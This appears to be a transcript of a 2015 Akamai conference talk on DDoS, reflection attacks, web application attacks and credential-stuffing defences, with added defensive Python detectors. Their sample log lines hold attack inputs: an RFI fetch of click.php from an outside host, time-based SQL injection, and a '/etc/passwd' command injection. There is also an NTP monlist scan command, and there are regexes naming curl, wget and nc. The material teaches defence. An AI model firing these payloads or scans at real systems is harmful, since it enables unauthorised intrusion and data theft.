
@NTXISSA #NTXISSACSC3

Cyber Warfare: Identifying Attackers Hiding Amongst the Flock

Anthony Lauro

Sr. Enterprise Security Architect

Akamai Technologies, Inc

October 3rd, 2015


Who am I? (unphilosophically speaking)

About me:

• Anthony Lauro | CISSP, GWAPT
• Sr. Enterprise Security Architect, Akamai Technologies, Inc
• 16 years Information Security experience
• Advise Akamai clients on cybersecurity resilience
• Lead Application Security training for the Enterprise Security Architecture team @Akamai
• Attended CCCC a long, long time ago…


“There are no rules of architecture for castles in the clouds.”
- Gilbert K. Chesterton


THREAT LANDSCAPE


Evolving Attack Campaigns

(Timeline chart, Q1 2013 through Q1 2014; events as captured:)
• 190 Gbps attack against US financial institution
• Account Checker (eCommerce)
• Largest DNS reflection attack, 167 Gbps (Financial Services)
• Operation Ababil
• DDoS (Retail)
• 209 Gbps, EMEA media company
• Record number of DDoS attacks in Q3 13 (chart label: 17%)

Top 10 Target Countries for Web Application Attacks, Q1 2015 (chart)

Top 10 Source Countries for Web Application Attacks, Q1 2015 (chart)


Attacks Grow Because Methods Improve

• Traditional DDoS attacks used compromised home computers
• ‘Cloud’ based DDoS attacks harness the scale of global botnets
• Amplification attacks target protocol vulns to amplify size: a small UDP request with a spoofed source address draws a much larger reply to the victim, and the figure below is the bandwidth amplification factor
  • SNMP (6.3x)
  • DNS (28x-54x)
  • CharGEN (358.8x)
  • NTP (556.9x)

(Chart: peak DDoS attack size per year, 2005 through 2014e, in Gbps and Mpps; tick values not reproduced)


You Don’t Have to Be Elite Anymore:

“You can do it, we can help”!


Infrastructure Attacks: Smoke Screen?

(Pie chart; segment values 27%, 24%, 8%, 4%, 30%, 5%; segment labels not captured)


WHAT MOTIVATES THE THREAT ACTOR?

Hacked Web Server (diagram)


Are You Prepared?


There Are No Immunities Between Verticals

Source: www.informationisbeautiful.net/


2014 Attack Trends

• Top three attack vectors are application layer attacks
• Defacement leads as the top attack, followed by SQLi and Account Hijacking as the most prevalent attacks seen in 2014

Source: Stateoftheinternet.com


Login Abuse: Account Checker Attacks

The fuel for any account checker is a list of credentials. Fortunately for attackers, there are a huge number of credentials that are public.

• 38,000,000 Adobe accounts
• 318,000 Facebook accounts
• 70,000 Google accounts
• 60,000 Yahoo accounts
• 22,000 Twitter accounts
• 8,000 ADP accounts
• 8,000 LinkedIn accounts


DEFENSIVE TECHNIQUES


A Castle

Built in 1385 as a defense against the French during the Hundred Years' War.

• Acts as a gateway
• Defensive resources become limited
• Entry and exits cannot coexist


WEB SECURITY: COMMON APPROACHES

Common Approaches to Web Security

Build It | Buy Boxes | Deny the problem


DO NOTHING


Approaches for Web Security

• On-Premise Hardware: router, firewall, load balancer, bandwidth
• Application Protection Cloud Service: cloud platform
• ISPs: Internet Service Providers


On-Premises Web Security Approach

On-Premise Hardware: router, firewall, load balancer, bandwidth

• Bandwidth: bandwidth constraint
• Connection & processing limitations
• Application vulnerability exploitation
  “Have to ingest ALL traffic before a Yes/No decision can be made”
• Performance degradation: throughput of devices cannot meet volume / requests per second of good and bad traffic spikes
• Reliability
• Accuracy: WAF configurations are complex, often not tuned properly or not in blocking mode


“I put the WAF on a SPAN port. I was afraid of blocking legitimate traffic!”

“How did this breach occur, we have a WAF!!”


Internet Service Provider Approach

ISPs: Internet Service Providers

• DDoS-only protection
• False positives / upstream blacklisting
• Single-homed protection
• Carrier-dependent architecture
• Capacity issues at scale


Those are birds…Right?

I forgot my shield!


Application Protection Cloud Service Approach

Application Protection Cloud Service: cloud platform

• Direct-to-origin DDoS protection gap
• Shared infrastructure (capacity constraints)
• Acceptable use monitoring challenge
• Retaining real-time visibility
• Not always enterprise-class protection


“In other words, careful where you aim that gun, #OpISIS, because it might point back at you as well.” - Mike Masnick, TechDirt

MULTI PERIMETER DEFENSE

For Internet-facing Applications

(Diagram: User, Internet, Datacenter)
• DNS: finding the application
• Web: retrieval and integrity of content and data
• Origin: supporting infrastructure and other applications


Multiple Perimeters For Internet-facing Applications

Volumetric Protection
• Massive resiliency
• Thousands of points of presence
• Distributed geographically
• Rate controls for noisy requestors

Attacks Against CNAMEs
• Network and application layer filtering capable
• Protocol validation/filtering
• SSL decrypt – re-encrypt
• Geo sensing and filtering capable
• Capacity: throughput & packets per second

Attacks Against Datacenter IPs
• Direct to origin protection using BGP redirection
• Multiple globally distributed scrubbing centers
• Attack capacity to withstand multiple attacks at once
• Good traffic bypass so as not to degrade performance


Multiple Perimeters For Internet-facing Applications

Application Layer Attacks
• SSL decryption at scale
• Risk scoring rule sets
• Tune accuracy over time

Attacks Against DNS
• Rate controls - connection throttling
• White listing
• Application inspection
• DNSSEC
• Client/server locks
• Anycast responses

Event Visibility
• Threat intel gathered and validated against global dataset
• Real-time event correlation between security policies
• Ability to identify hosts based on previous malicious behavior
• Import log feed from ‘cloud’ into internal SIEM for correlation


HOW DO YOU IDENTIFY & CLASSIFY?


THERE’S A DIFFERENCE BETWEEN VISIBILITY & INSIGHT


CLIENT REPUTATION SCORING

• Use behavioral data to protect your castle
• Collect and correlate attack traffic into a large dataset from across the web
• Identify bad clients based on past behavior
• Define a risk score for malicious clients
• Filter malicious clients based on risk score
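A worked version of the scoring loop these bullets describe, added here as an example and not Akamai's Client Reputation implementation: events collected from several sites are weighted by category, decayed by age so a client that went quiet is slowly forgiven, boosted when one client hits many unrelated sites (the payoff of the cross-web dataset), and filtered at a threshold. The event feed, category weights, half-life and threshold are all constructed assumptions.

```python
"""Client reputation scoring over a cross-site attack event feed.

Added example, not Akamai's Client Reputation logic. Events, category
weights, half-life and threshold are constructed/assumed values.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed weights: injection-class events count more than noisy scanning.
CATEGORY_WEIGHT = {"sqli": 5.0, "rfi": 5.0, "cmdi": 5.0, "xss": 3.0,
                   "scanner": 2.0, "rate_limit": 1.0}
HALF_LIFE = timedelta(hours=12)   # assumed: an event loses half its weight every 12 h
BLOCK_THRESHOLD = 10.0            # assumed: score at or above this gets filtered


def decayed_weight(event_time, now):
    """Exponential decay: a client that went quiet is slowly forgiven."""
    return 0.5 ** ((now - event_time) / HALF_LIFE)


def score_clients(events, now):
    """Return {ip: (risk_score, distinct_sites_attacked)}.

    events: iterable of dicts with keys time, ip, site, category.
    """
    raw = defaultdict(float)
    sites = defaultdict(set)
    for ev in events:
        weight = CATEGORY_WEIGHT.get(ev["category"], 1.0) * decayed_weight(ev["time"], now)
        raw[ev["ip"]] += weight
        sites[ev["ip"]].add(ev["site"])
    scores = {}
    for ip, total in raw.items():
        # Breadth multiplier: hitting several unrelated sites is stronger evidence
        # of a bad client than hammering one site.
        breadth = 1.0 + 0.5 * (len(sites[ip]) - 1)
        scores[ip] = (round(total * breadth, 2), len(sites[ip]))
    return scores


def clients_to_block(scores, threshold=BLOCK_THRESHOLD):
    """IPs whose score crosses the threshold, sorted for stable output."""
    return sorted(ip for ip, (score, _) in scores.items() if score >= threshold)


# Constructed sample feed (RFC 5737 documentation addresses, invented site names).
NOW = datetime(2015, 10, 3, 12, 0, 0)
SAMPLE_EVENTS = [
    {"time": NOW - timedelta(hours=1),    "ip": "203.0.113.7",   "site": "shop-a", "category": "sqli"},
    {"time": NOW - timedelta(minutes=30), "ip": "203.0.113.7",   "site": "bank-b", "category": "sqli"},
    {"time": NOW - timedelta(minutes=15), "ip": "203.0.113.7",   "site": "news-c", "category": "rfi"},
    {"time": NOW - timedelta(hours=2),    "ip": "198.51.100.20", "site": "shop-a", "category": "scanner"},
    {"time": NOW - timedelta(days=5),     "ip": "192.0.2.33",    "site": "shop-a", "category": "sqli"},
]

if __name__ == "__main__":
    scores = score_clients(SAMPLE_EVENTS, NOW)
    for ip, (score, n_sites) in sorted(scores.items(), key=lambda kv: -kv[1][0]):
        print(f"{ip:15} score={score:6.2f} sites={n_sites}")
    print("block:", clients_to_block(scores))
```

The three knobs that matter in practice are the half-life (how long a past offense keeps a client filtered), the breadth multiplier (how much cross-site evidence outweighs single-site noise) and the threshold; all three should be tuned against your own false-positive rate, and the score should be a signal into a rule, not an unconditional block list.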


Information vs. Intelligence

Information:
• Raw, unfiltered feed
• Aggregated from virtually every source
• May be true, false, misleading, incomplete, relevant or irrelevant
• Not actionable

Intelligence:
• Processed, sorted information
• Aggregated from reliable sources and cross-correlated for accuracy
• Accurate, timely, complete, assessed for relevancy
• Actionable

InfoSec teams are swimming in data. More raw “information” is not the solution.


Threats Change/Advance Over Time

(Chart: unique Shellshock payloads per day, 9/24 through 10/1, annotated “Shellshock disclosed”; counts captured include 11,008; 16,135; 21,359; 15,071; 30,427; 69,226 and 124,625, climbing to 124,625 by 10/1)

CASE STUDIES: APPLICATION / DDoS ATTACKS


Case Study: 320 Gbps DDoS Attack, Gaming Vertical, APAC Region

• Largest attack ever mitigated by Akamai against a single customer
• Targeted primary website, supporting network infrastructure, and DNS
• Multiple attack vectors:
  • SYN/UDP floods - entire subnet
  • Volumetric attack against DNS
• Attack characteristics:
  • 320 Gbps and 71.5 Mpps peak traffic
  • 2.1 million requests/s against DNS


One Attack in a Broader DDoS Attack Campaign

(Chart: per-attack peaks across the campaign, series Infrastructure (Gbps), Web (Gbps), authDNS (Mpps) and DNS Reflection (Mpps), with start and end markers; tick values not reproduced)

21+ day campaign against a single customer
• 39 distinct attacks targeting applications and DNS infrastructure
• Eight attacks >100 Gbps including record 320 Gbps attack

Olympics WAF Statistics (chart labels: Opening Ceremony, 1st day of sports)

• 132 BILLION requests processed by our WAFs: 10x more than 2010 Winter Olympics
• WAF rules triggered: 127x more than 2010 Winter Olympics
• Custom rules triggered: 166,000,000
• Rate controls (adaptive rules) triggered: 5,600,000
• Requests denied: 182,200,000

(Charts: attack traffic over time around the opening ceremony and during the Spain to Netherlands, Chile to Australia and Ivory Coast to Japan matches; axis ticks and match scores not reproduced)



Web Application Attacks by Industry – Q1 2015


The Attack du jour? SNMP Reflection

• Reflection attack
• Mostly SNMP v2c devices (~3+ years old) with default “public” community string
• Routers, printers, cable modems, NAS
• New tool automates sending GetBulkRequest to open SNMP servers
• Flood of SNMP GetResponse data sent from reflectors to victim on port 80
• SNMP query begins at highest (OID) tree level to obtain largest possible response


Case Study: NTP Attacks on Origin

• 500x return rate in traffic
• >100 Gbps attack traffic against origin
• 1,000+ increase in hits per second against origin

Attack Vector
Request with spoofed source IP of target server sent to a vulnerable NTP server that allows the monlist function. NTP server replies back to the target IP, direct to origin, at massive scale.


Use the nmap NSE script to identify vulnerable hosts

Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>

• The monitor list in response to the monlist command is limited to 600 associations.
• The monitor capability may not be enabled on the target, in which case you may receive an error number 4 (No Data Available).
• There may be a restriction on who can perform Mode 7 commands (e.g. "restrict noquery" in ntp.conf), in which case you may not receive a reply.
• This script does not handle authentication, and targets expecting auth info may respond with error number 3 (Format Error).
• A host that answers is both a reflector others can abuse and a source of leaked client addresses; ntpd 4.2.7p26 and later no longer implement monlist, and older builds can be fixed with “disable monitor” or “restrict default noquery” in ntp.conf.


SSDP aka UPnP (Universal Plug and Pray): SSDP 200-OK Response (capture shown)
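The amplification factors listed earlier and the SNMP, NTP and SSDP cases above share one shape on the wire: replies from many “legitimate” servers converge on one victim, and each reply is far larger than the spoofed request that triggered it. The following added example (not Akamai's detection logic; the flow records, ports and thresholds are constructed assumptions) scores a window of UDP flow records by reflector source port, distinct reflector count and average packet size, which is enough to raise an alert from a sampled NetFlow/sFlow feed before the pipe fills.

```python
"""Flag reflection/amplification floods in a window of flow records.

Added example, not Akamai's detection logic. Flow records are constructed:
(proto, src_ip, src_port, dst_ip, dst_port, packets, bytes) for one 60 s window,
as a NetFlow/sFlow collector might export them.
"""
from collections import defaultdict

# UDP services abused as reflectors, keyed by the source port their replies carry.
REFLECTOR_PORTS = {19: "chargen", 53: "dns", 123: "ntp", 161: "snmp", 1900: "ssdp"}
MIN_SOURCES = 5         # assumed: distinct reflectors before we call it a flood
MIN_AVG_BYTES = 300     # assumed: amplified replies are big, ordinary client traffic is not
WINDOW_SECONDS = 60     # assumed export interval of the flow records


def detect_reflection(flows):
    """Return {(victim_ip, service): stats} for groups that look like reflected floods.

    The victim is the destination; the sources are the reflectors' real addresses,
    which is why blocking by source alone does not help here.
    """
    groups = defaultdict(lambda: {"sources": set(), "packets": 0, "bytes": 0})
    for proto, src_ip, src_port, dst_ip, _dst_port, packets, nbytes in flows:
        if proto != "udp" or src_port not in REFLECTOR_PORTS:
            continue
        g = groups[(dst_ip, REFLECTOR_PORTS[src_port])]
        g["sources"].add(src_ip)
        g["packets"] += packets
        g["bytes"] += nbytes

    alerts = {}
    for key, g in groups.items():
        avg_bytes = g["bytes"] / g["packets"]
        if len(g["sources"]) >= MIN_SOURCES and avg_bytes >= MIN_AVG_BYTES:
            alerts[key] = {
                "sources": len(g["sources"]),
                "avg_bytes": round(avg_bytes),
                "mbps": round(g["bytes"] * 8 / WINDOW_SECONDS / 1e6, 2),
            }
    return alerts


# Constructed sample: eight NTP hosts (RFC 5737 ranges) each returning 50,000
# monlist-sized replies to port 80 of one victim, plus benign background traffic.
SAMPLE_FLOWS = [
    ("udp", f"192.0.2.{i}", 123, "198.51.100.10", 80, 50_000, 50_000 * 468) for i in range(1, 9)
] + [
    ("udp", "192.0.2.100", 123, "203.0.113.5", 47213, 10, 10 * 90),        # normal NTP sync
    ("udp", "192.0.2.101", 123, "203.0.113.5", 47214, 10, 10 * 90),
    ("udp", "192.0.2.53", 53, "198.51.100.10", 33000, 200, 200 * 120),    # ordinary DNS answers
    ("tcp", "203.0.113.9", 443, "198.51.100.10", 51234, 400, 400 * 1400),  # web, ignored
]

if __name__ == "__main__":
    for (victim, service), stats in detect_reflection(SAMPLE_FLOWS).items():
        print(f"{service.upper()} reflection toward {victim}: {stats}")
```

With sampled flows the byte and packet counts are estimates, so treat the Mbps figure as an order of magnitude; the distinct-source count and the average reply size are the robust signals, and the destination port (80 in the SNMP case) is chosen by the attacker to pass through firewalls, so it should not be part of the match.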


DNS Attack Targeting Akamai Customer

• DNS requests peaked at 168k per second.

• 19B hits in 5 days. Normally serve ~30M hits per week.


DNS Hijack Attacks: Common Tactic for Middle Eastern Attackers

(Screenshot: US DoD’s DNS hijacked)

Best Practice DNS Locks (EPP domain status codes)

• Registrar-set (client) locks, requested by the domain owner:
  • clientUpdateProhibited
  • clientTransferProhibited
  • clientDeleteProhibited
• Registry-set (server) locks, ordered through the registrar as a registry lock:
  • serverUpdateProhibited
  • serverTransferProhibited
  • serverDeleteProhibited
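To turn that lock list into a check, here is an added example (not part of the talk) that parses whois output for the EPP status lines and reports which registrar and registry locks are missing. The whois text is constructed, and whois formats vary by registrar, so the regex accepts both the “Domain Status:” and the shorter “Status:” prefix. These are registration locks at the registrar and registry, not anything in DNS itself: they stop an attacker who takes over a registrar account from repointing name servers or transferring the domain.

```python
"""Report missing registrar (client*) and registry (server*) locks from whois text.

Added example, not part of the talk. SAMPLE_WHOIS is constructed; feed in the
output of `whois yourdomain` for a real check.
"""
import re

REGISTRAR_LOCKS = {"clientUpdateProhibited", "clientTransferProhibited", "clientDeleteProhibited"}
REGISTRY_LOCKS = {"serverUpdateProhibited", "serverTransferProhibited", "serverDeleteProhibited"}

# Matches "Domain Status: clientTransferProhibited https://icann.org/epp#..." and the
# shorter "Status: clientTransferProhibited" form some registrars emit.
STATUS_RE = re.compile(r"^\s*(?:Domain\s+)?Status:\s*([A-Za-z]+)", re.IGNORECASE | re.MULTILINE)


def parse_statuses(whois_text):
    """Lower-cased set of EPP status codes found in the whois text."""
    return {code.lower() for code in STATUS_RE.findall(whois_text)}


def missing_locks(whois_text):
    """Lock codes absent from the whois text, grouped by who has to set them."""
    present = parse_statuses(whois_text)
    return {
        "registrar": sorted(c for c in REGISTRAR_LOCKS if c.lower() not in present),
        "registry": sorted(c for c in REGISTRY_LOCKS if c.lower() not in present),
    }


def is_fully_locked(whois_text):
    gaps = missing_locks(whois_text)
    return not gaps["registrar"] and not gaps["registry"]


# Constructed whois response: transfer and delete locks set, update lock and all
# registry locks missing (a common state after a default registrar setup).
SAMPLE_WHOIS = """\
Domain Name: EXAMPLE-CORP.COM
Registrar: Example Registrar, Inc.
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Name Server: NS1.EXAMPLE-CORP.COM
"""

if __name__ == "__main__":
    for who, codes in missing_locks(SAMPLE_WHOIS).items():
        print(f"missing {who} locks: {codes or 'none'}")
```

Run it on a schedule against every domain you own: a lock that silently disappears (or a status line that turns into “pendingTransfer”) is the early warning a DNS hijack gives you.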


Remote File Inclusion

RFI attempt to pull the click.php file from a remote location, using the RFI vuln in the TimThumb plugin.


Here’s what click.php is really about!

HTTP(S) redirections can fluctuate between 14-20 different pay-per-click companies and advertisers, and that means precious bitcoin revenue for the attacker and his friends.

http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/


When good things go bad:

Rogue Reseller to Competitor

“After years of this relationship we recently found that they now have a copycat site and are selling

our products that they are now manufacturing on their own.” – Enterprise Manufacturing Customer

“At first they were just scraping our site and we saw it to be mutually beneficial…”


Blind SQL Injection: Time Based Attack

This type of blind SQL injection relies on making the database pause for a specified amount of time when an injected condition is true, and timing the response to learn the answer. Using this method, an attacker enumerates each character of the desired piece of data, one true/false question at a time.

(Client request shown)


SQL Injection Analysis: 2000 customers over one week

Protocol Breakdown

Protocol | SQL Injection Attacks | %
HTTP     | 8,137,681             | 96.6
HTTPS    | 287,808               | 3.4
Total    | 8,425,489             | 100

Breakdown by Intent (chart)

Source: Akamai CSI


CMD INJECTION


Remote File Inclusion: attack request and client info (screenshot)
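The RFI, time-based blind SQLi and command injection slides above each show a single request. The following added example (not Akamai's WAF rules) puts the three signatures into one small checker over constructed access-log request lines: parameter values are decoded twice to catch double encoding, SQL inline comments are turned back into whitespace, an absolute URL or PHP stream wrapper in a parameter that does not point at our own host is treated as RFI, and the database delay primitives and shell metacharacter-plus-command patterns cover the other two. SITE_HOSTS, the regexes, the command-name list and the log lines are all assumptions; tune them on your own traffic before anything here is allowed to block.

```python
"""Signature checks for RFI, time-based blind SQLi and OS command injection.

Added example, not Akamai's WAF rules. SITE_HOSTS, the patterns and the
request lines are constructed; tune before using anything here to block.
"""
import re
from urllib.parse import urlsplit, unquote_plus

SITE_HOSTS = {"www.example-shop.test"}  # assumed: hostnames this site legitimately references

# Absolute URL or PHP stream wrapper as a parameter value = remote file inclusion attempt
RFI_RE = re.compile(r"^(?:https?|ftp)://|^(?:php|data|expect):", re.I)
# Delay primitives used for time-based blind SQLi on MySQL, MSSQL, PostgreSQL and Oracle
SQLI_TIME_RE = re.compile(
    r"\b(?:sleep|benchmark|pg_sleep|dbms_lock\.sleep)\s*\(|\bwaitfor\s+delay\b|dbms_pipe\.receive_message",
    re.I)
# Shell metacharacter followed by a command name = OS command injection attempt
CMDI_RE = re.compile(
    r"(?:[;|&`\n]|\$\()\s*(?:cat|id|whoami|uname|wget|curl|nc|sh|bash|ls|ping)\b", re.I)


def decode_value(raw):
    """Decode twice (defeats double encoding) and turn SQL inline comments into spaces."""
    value = unquote_plus(unquote_plus(raw))
    return re.sub(r"/\*.*?\*/", " ", value)


def query_params(url):
    """Minimal query parser: split on '&' only so a ';' stays inside the value."""
    for pair in urlsplit(url).query.split("&"):
        if pair:
            name, _, raw = pair.partition("=")
            yield unquote_plus(name), decode_value(raw)


def classify_request(line):
    """Return [(param, finding), ...] for one 'METHOD URL HTTP/x' request line."""
    url = line.split(maxsplit=2)[1]
    findings = []
    for name, value in query_params(url):
        if RFI_RE.match(value) and urlsplit(value).hostname not in SITE_HOSTS:
            findings.append((name, "rfi"))
        if SQLI_TIME_RE.search(value):
            findings.append((name, "sqli_time_based"))
        if CMDI_RE.search(value):
            findings.append((name, "cmd_injection"))
    return findings


def scan_log(lines):
    """Map each suspicious request line to its findings; clean lines are left out."""
    report = {}
    for line in lines:
        findings = classify_request(line)
        if findings:
            report[line] = findings
    return report


# Constructed request lines, the way they would appear in an access log.
SAMPLE_LOG = [
    "GET /wp-content/themes/demo/timthumb.php?src=http://203.0.113.9/click.php HTTP/1.1",
    "GET /product.php?id=7%27%20AND%20SLEEP(5)--%20 HTTP/1.1",
    "GET /search.php?q=foo%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1",
    "GET /cgi-bin/ping.cgi?host=127.0.0.1;cat%20/etc/passwd HTTP/1.1",
    "GET /p.php?id=1%2527%2520AND%2520SLEEP%25285%2529 HTTP/1.1",          # double encoded
    "GET /image.php?src=https://www.example-shop.test/logo.png HTTP/1.1",  # same-site, benign
    "GET /product.php?id=7 HTTP/1.1",
]

if __name__ == "__main__":
    for line, findings in scan_log(SAMPLE_LOG).items():
        print(findings, line)
```

Signatures only catch payloads you have already thought of; for time-based blind SQLi the complementary check is behavioural, i.e. a client whose responses for one URL cluster at exactly the delay it requested (5 s here), which is the same “past behaviour” signal the reputation scoring earlier in the deck feeds on.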


“Credentials” Cookie Value Exposure


ACCOUNT CHECKERS: CARDERS

Several techniques are used to avoid detection and mitigation, including:

● Randomization of the User-Agent header
● Targeting of alternative (mobile/API/legacy) login pages, which may have weaker mitigation controls and are often overlooked by the customer.
● Attacks originate from a highly distributed set of IP addresses, with different source countries.
● Use of low request rates to evade rate controls.
● Change in order of headers.
● Changes in tactics when 403 responses are received.


Fraud – Vietnamese Carders

Carder TTP

• Build Tools Server

• Cultivate List of Open Proxies

• Acquire Compromised Logins

• Check/Alter Compromised Accounts

• Make Fraudulent Purchases

• Cash out/Resell gift cards


Login Abuse: THE STRUGGLE IS REAL

You know who you are!


Login Abuses: TTPs and Defenses

Rate controls to block fast-moving scripts
• Attack relies on being able to check thousands of accounts quickly
• Blocking aggressive scripts prevents login exploitation

Internal monitoring for changes to customer accounts
• Email address
• Shipping address
• Same email on multiple accounts

Geo blocklists for areas where there is no business
• Cuts down on the places attackers can launch from
• Do cloud server providers need to access your webpage?

Custom rules to block User-Agent strings (or lack thereof)
• Attack scripts are often simple and will contain only “curl” or “wget”
• Sometimes none at all
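The evasion list on the ACCOUNT CHECKERS slide and the defenses above map onto a handful of per-client and per-account counters. The following added example (not Akamai's rule set) runs them over constructed login events: per IP it checks request rate, number of distinct usernames, number of distinct User-Agents (randomization), tool or missing User-Agents, and a geo blocklist; then, because the low-and-slow distributed checker defeats every per-IP rule, it pivots on the account and counts how many IPs failed against each username. The event log, the IP-to-country table and every threshold are assumptions.

```python
"""Spot account-checker traffic in login events.

Added example, not Akamai's rule set. Events, the IP-to-country table and
every threshold are constructed/assumed; feed in your own auth logs and GeoIP.
"""
from collections import defaultdict
import re

LOGIN_PATHS = {"/login", "/api/v1/login", "/m/login"}   # include the "forgotten" mobile/API paths
TOOL_UA_RE = re.compile(r"^(?:curl|wget|python-requests|go-http-client)\b", re.I)
ALLOWED_COUNTRIES = {"US", "CA"}                        # assumed: where the business operates
MAX_ATTEMPTS_PER_MIN = 30                               # rate control
MAX_USERS_PER_IP = 10                                   # checkers cycle through credential lists
MAX_UAS_PER_IP = 5                                      # one client, many User-Agents = randomization
MIN_IPS_PER_USER = 8                                    # low and slow: one account, many sources

# Assumed GeoIP answers (RFC 5737 addresses).
IP_COUNTRY = {f"192.0.2.{i}": "US" for i in range(1, 51)}
IP_COUNTRY.update({"203.0.113.7": "VN", "198.51.100.4": "US"})


def analyze(events):
    """Return (per_ip_findings, slow_distributed_users).

    events: dicts with ts (epoch seconds), ip, user, ua, status ('ok'/'fail'), path.
    """
    per_ip = defaultdict(lambda: {"attempts": 0, "users": set(), "uas": set(), "ts": []})
    user_ips = defaultdict(set)
    for e in events:
        if e["path"] not in LOGIN_PATHS:
            continue
        s = per_ip[e["ip"]]
        s["attempts"] += 1
        s["users"].add(e["user"])
        s["uas"].add(e["ua"])
        s["ts"].append(e["ts"])
        if e["status"] == "fail":
            user_ips[e["user"]].add(e["ip"])

    findings = {}
    for ip, s in per_ip.items():
        hits = []
        minutes = max((max(s["ts"]) - min(s["ts"])) / 60, 1.0)
        if s["attempts"] / minutes > MAX_ATTEMPTS_PER_MIN:
            hits.append("rate")
        if len(s["users"]) > MAX_USERS_PER_IP:
            hits.append("many_usernames")
        if len(s["uas"]) > MAX_UAS_PER_IP:
            hits.append("ua_randomization")
        if any(ua == "" or TOOL_UA_RE.match(ua) for ua in s["uas"]):
            hits.append("tool_or_missing_ua")
        if IP_COUNTRY.get(ip, "??") not in ALLOWED_COUNTRIES:
            hits.append("geo_blocklist")
        if hits:
            findings[ip] = hits
    # Per-IP rules miss a checker that spreads one list over many IPs at low rate;
    # pivot on the account instead: how many distinct IPs failed against it?
    slow = {u: sorted(ips) for u, ips in user_ips.items() if len(ips) >= MIN_IPS_PER_USER}
    return findings, slow


def _ev(ts, ip, user, ua, status="fail", path="/login"):
    return {"ts": ts, "ip": ip, "user": user, "ua": ua, "status": status, "path": path}


BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/45.0 Safari/537.36"
# Constructed events: four behaviours in one log.
SAMPLE_EVENTS = (
    # fast checker from one IP, rotating usernames and User-Agents against the API login
    [_ev(1000 + i // 2, "203.0.113.7", f"user{i:03d}", f"Mozilla/5.0 (Variant {i % 8})",
         path="/api/v1/login") for i in range(60)]
    # bare curl script, a handful of tries
    + [_ev(2000 + i, "198.51.100.4", u, "curl/7.43.0") for i, u in enumerate(["bob", "carol", "dave"])]
    # low-and-slow: one victim account, ten IPs, five minutes apart, normal browser UA
    + [_ev(3000 + 300 * i, f"192.0.2.{i}", "victim@example.test", BROWSER_UA) for i in range(1, 11)]
    # a real user who mistyped once
    + [_ev(4000, "192.0.2.50", "alice", BROWSER_UA), _ev(4005, "192.0.2.50", "alice", BROWSER_UA, "ok")]
)

if __name__ == "__main__":
    per_ip, slow = analyze(SAMPLE_EVENTS)
    for ip, hits in per_ip.items():
        print(ip, hits)
    print("targeted accounts:", slow)
```

The fast checker trips four rules at once and the curl script one, but the ten single-attempt IPs against victim@example.test trip none, which is exactly the case the slide warns about; that account shows up only in the per-user pivot, where the response is to step up authentication for the account rather than to block any one source.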


DD4BC: (DDoS for Bitcoin)

• Industries affected
  • Payment Processing
  • Banking & Credit Unions
  • Gambling
  • Oil & Gas
  • E-Commerce
  • High Tech Consulting/Services
• Attack Types
  • Booter/stresser sites most likely culprit
  • Reflection attacks


Looking Forward into 2015

• Industry Verticals
  • Gaming, Financial Services, Internet & Telecom, Software & Tech, and Media verticals expected to be targeted heavily in 2015
  • Security vulnerabilities continue to increase due to bespoke/custom applications
  • Good history of successful attacks
• DDoS Attacks
  • Expect more ‘mega’ attacks > 100 Gbps
  • Commoditization of DDoS attacks
  • IPv6 uptake to increase DDoS vectors
  • Never pay ransoms, but do have a plan
• APPLICATION ATTACK TRENDS
  • APPSEC IS FAILING – NEED HELP!
  • IF YOU DON’T HAVE AN APPSEC PROGRAM, START ONE!
  • INJECTION & XSS RIDE THE OWASP TOP 10
  • SESSION MGMT – YOU’RE DOING IT WRONG
  • DEVELOPERS – YOU’RE BEHIND!


Cyber Security Requirements: 5 Points To Take Away

1. You Need ‘Validated’ Data: to derive intelligence on current & evolving threats.
2. Scale, Availability & Resilience: to be high performing, take the punches, & stay online.
3. A Plan: to understand how to respond to bad-day scenarios.
4. Control & Flexibility: to adapt your defenses dynamically.
5. People & Experience: to execute every time you come under attack.


RESOURCES

OWASP: OPEN WEB APPLICATION SECURITY PROJECT

https://www.owasp.org/index.php/Main_Page

BSIMM5: BUILDING SECURITY IN MATURITY MODEL v5

https://www.bsimm.com/

SANS SWAT: SECURING WEB APPLICATION TECHNOLOGIES v1.1

http://software-security.sans.org/resources/swat

CERT: SECURE CODING STANDARDS

http://www.cert.org/secure-coding/research/secure-coding-standards.cfm?

AKAMAI TECHNOLOGIES (HEY, WHY NOT)

https://www.akamai.com/us/en/cloud-security.jsp


Tony Lauro | CISSP, GWAPT

Senior Enterprise Security Architect

@tonylauro


The Collin College Engineering Department

Collin College Student Chapter of the North Texas ISSA

North Texas ISSA (Information Systems Security Association)

NTX ISSA Cyber Security Conference – October 2-3, 2015

Thank you